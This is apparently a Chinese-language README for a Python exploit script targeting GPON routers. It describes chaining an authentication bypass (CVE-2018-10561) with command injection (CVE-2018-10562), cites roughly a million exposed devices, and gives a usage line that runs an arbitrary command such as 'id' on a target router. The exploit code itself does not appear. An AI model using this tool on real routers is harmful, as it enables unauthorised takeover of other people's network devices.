如今许多路由器使用GPON互联网,VPNMentor发现了一种绕过设备所有身份验证的方法(CVE-2018-10561)。利用此身份验证绕过,还可以揭示另一个命令注入漏洞(CVE-2018-10562)并在设备上执行命令。
根据Shodan的数据,撰写本文时,近一百万个此类设备暴露在互联网上。
requests
urllib2
Kali Linux
Ubuntu 17.10 Server
python gpon_rce.py TARGET_URL COMMAND
例如
python gpon_rce.py http://192.168.1.15 'id'